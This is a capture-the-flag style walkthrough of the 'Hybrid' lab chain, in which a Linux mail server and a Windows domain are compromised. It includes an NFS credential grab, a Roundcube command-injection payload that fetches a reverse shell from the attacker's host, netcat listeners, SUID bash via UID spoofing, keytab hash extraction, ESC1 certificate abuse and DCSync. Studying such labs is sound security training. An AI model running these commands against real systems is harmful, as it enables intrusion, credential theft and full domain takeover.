Skip to main content

Chain - Hybrid

Writeup Author: bobbuilder

Overview

Category: Chain

Difficulty: Easy Windows

Machine Author: xct

Domain: hybrid.vl

Machines: Linux (mail01.hybrid.vl) and Windows (DC and user endpoints)

Objective: Domain Admin compromise via NFS, Roundcube RCE, KeePass extraction, and certificate-based authentication bypassing PKINIT.

Reconnaissance & Initial Access

The linux machine has a web server, which we see is a login portal for roundcubemail.

Roundcube Webmail Enumeration

Identified http://mail01.hybrid.vl/ running Roundcube If we download the source code of this project, we see there is CHANGELOG.md in root of the project. On the linux machine http://ip/CHANGELOG.md discloses the version of the the app.

Gaining User1 – Exploiting Roundcube (Linux)

NFS Mount to Discover Credentials

showmount -e 10.10.173.134
sudo mount -t nfs 10.10.173.134:/ ./target-NFS/ -o nolock
ls target-NFS/opt/share/backup.tar.gz

Extracted /etc/dovecot credentials:

admin@hybrid.vl:<REDACTED>
peter.turner@hybrid.vl:<REDACTED>

Roundcube Exploitation (RCE)

We login the webapp, and we see there is the "markasjunk" plugin which has a known RCE.

  1. Login as peter.turner@hybrid.vl.
  2. Create identity with RCE payload: 
    admin%26curl${IFS}-o${IFS}/tmp/shell.php${IFS}<MY_IP>/php-reverse-shell.php%26%40hybrid.vl
  3. Send email and move it to Junk folder to trigger payload.
  4. Repeat with the payload to trigger the reverse shell: 
    admin%26php${IFS}/tmp/shell.php%26%40hybrid.vl
  5. Listen on attacker box: 
    nc -lvvp 1234

Privilege Escalation to Peter (Linux)

LinPEAS Discovery

Upload results:

curl -X POST http://<MY_IP>/upload -F 'files=@linoutput.txt' --insecure

Found write access to /opt/share (NFS). Used UID spoofing for privilege escalation.

Exploit: Spoof UID & Set SUID Bash

  1. On victim: 
    id peter.turner@hybrid.vl  # UID=902601108
cp /bin/bash initbash
  2. On attacker (with mounted NFS): 
    sudo useradd -u 902601108 peter.turner@hybrid.vl
sudo su -s /bin/bash attacker
cp initbash bash
chmod +s bash
  3. On victim: 
    ./bash -p
id

Gaining User2 – KeePass + SSH Access

  1. Copy KeePass file:

    cp /home/peter.turner@hybrid.vl/passwords.kdbx /opt/share/

  2. Open KeePass with peter credentials (from NFS) and extract SSH password:

    Uname: peter.turner
Pass: <REDACTED>

  3. SSH into the Linux machine:

    ssh peter.turner@hybrid.vl@10.10.173.134

  4. Escalate:

    sudo -l
sudo su

Gaining Root – Lateral Movement (Windows Domain)

Enumerate SMB Shares

nxc smb hybrid.vl -u 'peter.turner'  -p '<REDACTED>' --shares

BloodHound & ADCS Enumeration

bloodhound-python -c all -u 'peter.turner' -p '<REDACTED>' -d hybrid.vl -ns 10.10.130.229
certipy find -u 'peter.turner@hybrid.vl' -p '<REDACTED>' -stdout -debug -scheme ldaps -vulnerable

Identified vulnerable ESC1 template HybridComputers, usable by Domain Computers.

Exploiting ADCS Without PKINIT

Extracting Ticket from Linux Keytab

  1. Transfer /etc/krb5.keytab and validate:

    kinit 'MAIL01$@HYBRID.VL' -k -t krb5.keytab
klist

  2. Extract NTLM hash:

    python3 keytabextract.py krb5.keytab

Abuse ESC1 Certificate Template

  1. Request certificate:

    certipy req -u 'mail01$' -hashes :<NTLM_HASH> -ca hybrid-DC01-CA -template HybridComputers -upn Administrator@hybrid.vl -target-ip 10.10.211.85 -key-size 4096

  2. Extract private key:

    certipy cert -pfx administrator.pfx -nocert -out administrator.key

Authenticate Without PKINIT (Schannel)

  1. Elevate Peter’s privileges:

    python3 passthecert.py -crt administrator.crt -key administrator.key -dc-ip 10.10.211.85 -action modify_user -target peter.turner -elevate -domain hybrid.vl

  2. DCSync as peter.turner:

    impacket-secretsdump hybrid.vl/peter.turner:'<REDACTED>'@10.10.211.85 -just-dc
Back to top